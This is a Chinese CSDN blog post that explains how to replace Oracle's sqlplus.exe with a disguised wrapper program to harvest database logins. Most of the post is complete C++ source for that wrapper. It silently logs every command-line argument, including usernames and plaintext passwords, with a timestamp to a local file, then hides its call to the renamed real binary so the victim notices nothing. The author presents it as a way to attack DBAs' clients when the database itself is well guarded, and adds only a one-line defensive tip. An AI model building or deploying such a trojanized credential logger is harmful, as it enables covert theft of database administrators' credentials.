偷龙转凤SQLPlus得到数据库登录信息

最新推荐文章于 2022-05-01 16:18:50 发布
最新推荐文章于 2022-05-01 16:18:50 发布
阅读量1.6k 收藏
点赞数
文章标签: Oracle 信息安全 数据库安全 记录登录信息
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xcl168/article/details/21340919
版权

         当DBA登录本地或远程数据库时,为了省事,用"sqlplus 用户名/密码@连接服务名" 的方式登录数据库是再平常不过了,而我们如果将Oracle的SQLPlus换成我们自己的实现,然后当使用时,记录下它的登录信息,就得到了数据库的用户名,密码等信息。

        这是一种很简单的,偷龙转凤的方式,有其局限性。但有时,如果数据库本身的防护很严,从DBA客户端这边下手,利用这种方式有时也能有意外的收获。

效果图:

   这种方式跑起来和Oracle原来的是一模一样的. 光看是看不来什么地。 偷笑

   

被记录下的登录信息:


代码如下:  

/**
*author: xiongchuanliang
*desc: 用自定义的sqlplus替换掉Oracle原版的,并在自定义的程序中记录下用户的登录信息的演示
       1. 找到Oracle自带的sqlplus.exe,将其命名为其它文件
	   2. 用自定义的替换掉原版
*/
#include <stdio.h>
#include <stdlib.h>

#include <Windows.h>

#include <iostream>
#include <fstream>
using namespace std;

HRESULT CMDEx(const char *pCmd) ;

//将原版的sqlplus.exe改为sqlplus_ora.exe";
const string sqlplus_path = "C:/oracle/product/11.2.0/dbhome_1/BIN/sqlplus_ora.exe";
const string oper_log = "C:/mysqlplus.log";

int main(int argc,char* argv[])
{	
	string sqlplus_cmd = sqlplus_path;

	ofstream flog(oper_log,ios::app);
	SYSTEMTIME sys;
	if(flog){ 			
		GetLocalTime(&sys);
		flog<<sys.wYear<<"-"<<sys.wMonth<<"-"<<sys.wDay<<" "<<sys.wHour<<":"<<sys.wMinute<<":"<<sys.wSecond<<" ";
	}
	for(int i=1;i<argc;i++)
	{
		sqlplus_cmd.append(" ");
		sqlplus_cmd.append(argv[i]);		
		if(flog) flog<<" "<<argv[i];
	}
	if(flog){
		flog<<endl; 
	    flog.close();
	}
	cout<< "演示:%s\n"<<sqlplus_cmd.c_str()<<endl;
	CMDEx(sqlplus_cmd.c_str());
	return 0;
}

HRESULT CMDEx(const char *pCmd) //LPCTSTR pszCMD
{
	
#if defined(WIN32) || defined(WIN64)
	if(pCmd == NULL || pCmd[0] == 0)
	{
		return S_FALSE;
	}
	
	STARTUPINFOA	 si;
	PROCESS_INFORMATION	 pi;
	HANDLE	 hRead, hWrite;
	SECURITY_ATTRIBUTES	 sa = {0, NULL, TRUE};

	//创建匿名管道
	if(!CreatePipe(&hRead, &hWrite, &sa, 0))
	{
		return S_FALSE;
	}
	ZeroMemory( &pi, sizeof(pi) );
	ZeroMemory(&si, sizeof(STARTUPINFO));
	si.cb	 = sizeof(STARTUPINFO);
	si.wShowWindow	= SW_HIDE; 	
	si.hStdOutput	= hWrite;
	si.hStdError	= hWrite;
	si.hStdInput	= hRead;	
	si.dwFlags	 = STARTF_USESHOWWINDOW;								

	char szCMD[1024] = {0};
	sprintf_s(szCMD,1024,"cmd.exe /C %.1000s",pCmd);		

	//创建进程执行命令
	if(CreateProcessA(NULL,szCMD , NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
	{
		
		//等待命令执行完成
		WaitForSingleObject(pi.hProcess, INFINITE); 

		CloseHandle(hWrite);
		DWORD	dwRet, dwReaded;
		char	szBuf[256] = {0};

		//获取进程执行返回值
		GetExitCodeProcess(pi.hProcess, &dwRet);	

		//读取控制台终端输出
		while(ReadFile(hRead, szBuf, 255, &dwReaded, NULL))
		{
			szBuf[dwReaded] = 0;		
			//输入命令内容到屏幕
			cout<< szBuf <<endl;
			memset(szBuf,0,256);
		}
		CloseHandle(hRead);
		return HRESULT_FROM_WIN32(dwRet);
	}
	else
	{
		CloseHandle(hWrite);
		CloseHandle(hRead);
		return(HRESULT_FROM_WIN32(GetLastError()));
	}
#else
	return 0;
#endif
}
  这仅演示了下基本功能,以此类推,其它数据库的一些命令行程序也可以用这种方式做, 对这种方式最好的防护方法是在输入连接字符串时不输入明文的密码


MAIL: xcl_168@aliyun.com

BLOG: http://blog.csdn.net/xcl168

拙_言
关注
专栏目录
Sqlplus_登录数据库
12-01
"Sqlplus 登录数据库" SqlplusOracle 数据库管理系统中的一种命令行工具,用于与 Oracle 数据库进行交互。Sqlplus 登录数据库是指使用 Sqlplus 工具连接到 Oracle 数据库的过程。在这个过程中,用户需要输入...
sqlplus调用sql脚本执行时报错SP2-0734: unknown command beginning的解决方法
neolulu1987的博客
08-01 4万+
1、将sql文件的语句中的所有中文注释改为英文注释; 2、sql文件开头使用set sqlblanklines on,这是因为有空行导致sql语句加载到机器内存中截断了。
sqlplus / as sysdba:未找到命令,解决方法
qq_44778503的博客
05-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、sqlplus / as sysdba是什么?二、sqlplus / as sysdb报错:未找到命令三、解决方法:切换登录用户环境四、延展:为什么,普通切换:su oracle登录不了? 前言 sqlplus / as sysdba:未找到命令,解决方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、sqlplus / as sysdba是什么? sqlplus / as sysdba,是oracle登录三种.
sqlplus执行语句报错:unknown command beginning解决方案
人生如逆旅,我亦是行人。。。
03-07 1万+
今天在sqlplus中执行一个建表脚本的时候,报错“SP2-0734: unknown command beginning "crea..." - rest of line ignored."。但是这个建表脚本在navicat客户端执行是正常的。因为sql脚本是在windows下编写的,一开始认为是windows和linux的一些格式符不同导致sqlplus不识别脚本中的命令,于是打开vim
sqlplus中执行语句时候报unknown command beginning错
寒江的专栏
09-15 2万+
sqlplus中执行语句时候报unknown command beginning错 提交给维护部门批量修改数据的文件,在sqlplus中执行时候报错 SP2-0734: unknown command beginning "where t.bg..." - re
Oracle通过sqlplus连接数据库的方式
09-09
TNS(Transparent Network Substrate)是Oracle的一种网络服务,它定义了如何找到数据库实例的详细信息。你可以创建一个TNS配置文件(通常名为tnsnames.ora),然后使用`sqlplus`命令通过TNS名称连接到数据库。 `...
sqlplus连接数据库方法
04-06
本文将详细介绍如何使用sqlplus登录Oracle数据库,包括四种主要的方法。 1. Sqlplus工具登录Oracle数据库 (1) 本机orcl数据库:在命令行界面输入`sqlplus username/password@instance`,例如,如果用户名和密码都...
sqlplus找不到命令
soldier_jw的博客
09-04 1万+
最近遇到个问题,sqlplus这个命令写到脚本里面也可以正常使用,但是放到crontab里面就找不到命令; 原因:sqlplus在其它目录可以使用,说明环境变量已经被加载了,在定时任务中不能用, 需要在脚本中将环境变量中加载。 我的操作是: #!/bin/bash #soldier 2018-09-04 #网优数据巡检,先入到数据库中,然后会由其它程序发送到邮件...
SP2-0734: unknown command beginning 'XXX' - rest of line ignored
ak_red007的专栏
05-22 1万+
[size=large]在导出数据文件时报错: SP2-0734: unknown command beginning "exp XXX- rest of line ignored. 原因: Sqlplus中,不允许sql语句中间有空行,sqlplus中遇到空格就认为是语句结束了。 解决办法: (1)在Sqlplus中手敲代码,不要从其他地方复制粘贴 (2)出现这种现象也可以 ...
sqlplus连接数据库的几种方法
LiangZiBoy的博客
01-06 3万+
方法一 :  将数据库地址、端口号、SID、用户名、密码都输进去,这种方法最简单,只要有sqlplus就能使用,不需要配置。 格式:sqlplus [username]/[password]@[host]:[port]/[sid] 例:sqlplus system/123456@192.168.8.11:1521/orcl 方法二 :  同方法一类似。 格式: sql
Oracle 错误: sp2 0734 unknown command beginning -- 解决方法
weixin_30861797的博客
02-14 1502
今天在做一个Oracle的倒库操作,使用SQLPLUS倒库的时候发生SP2 0734的错误 !! 注:我是用的是Ocale11g自带的SQLPLUS 由于之前在工具(SQL Developer)里面运行SQL脚本没有问题,所以排除脚本问题。 在网上搜索了一下,原来是SQL脚本里面的建表语句里面有“空行“,例如: CREATE TABLE "table_name" (...
sqlplus中执行语句时候报错误SP2-0734: 未知的命令开头"id varchar..." - 忽略了剩余的行
热门推荐
haiross的专栏
07-23 7万+
sqlplus中执行语句时候报unknown command beginning错误 提交给维护部门批量修改数据的文件,在sqlplus中执行时候报错 SP2-0734: unknown command beginning "where t.bg..." - rest of line ignored. SQL> 19‘,‘YYYY-MM-dd‘),0); SP2-0
cmd下sqlplus登陆常用命令(转)
ztao2333的博客
10-11 572
sqlplus + 数据库名字+@。。。 [code="java"] SQL> set echo on—————————————————设置运行命令是是否显示语句 SQL> set feedback on———————————————-设置显示“已选择XX行” SQL> set colsep | —————————————————设置列与列之间的分割符号 SQL> set pages...
SP2-0042: unknown command--rest of line ignored.
lansesl2008的专栏
12-18 3万+
小白今天在linux环境刷一个数据库的Precedure,出现了如下报错:   SP2-0042: unknown command "AS" - rest of line ignored. SP2-0734: unknown command beginning "v_WSJA ..." - rest of line ignored. SP2-0734: unknown command be
【6层】一字型框架办公楼(含建筑结构图、计算书).zip
09-21
【6层】一字型框架办公楼(含建筑结构图、计算书) 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md或论文文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。 5、资源来自互联网采集,如有侵权,私聊博主删除。 6、可私信博主看论文后选择购买源代码。
Kotlin编程全攻略:从基础到实战项目的系统学习资料
09-21
Kotlin作为一种现代、简洁的编程语言,正逐渐成为Android开发的新宠。本文将为您介绍一套全面的Kotlin学习资料,包括学习大纲、PDF文档、源代码以及配套视频教程,帮助您从Kotlin的基础语法到实战项目开发,系统地提升您的编程技能。
机械原理课程设计_牛头刨床说明书.doc
最新发布
09-21
机械原理课程设计_牛头刨床说明书.doc
Oracle数据库登录方法详解:SQLPLUS、命令行与PL/SQL
这份PPT文档为初学者和数据库管理员提供了实用的指南,涵盖了从基础的SQLPLUS登录到高级的PL/SQL登录方法,有助于确保在不同场景下都能有效地管理和维护Oracle数据库。通过掌握这些登录技巧,用户可以更高效地进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值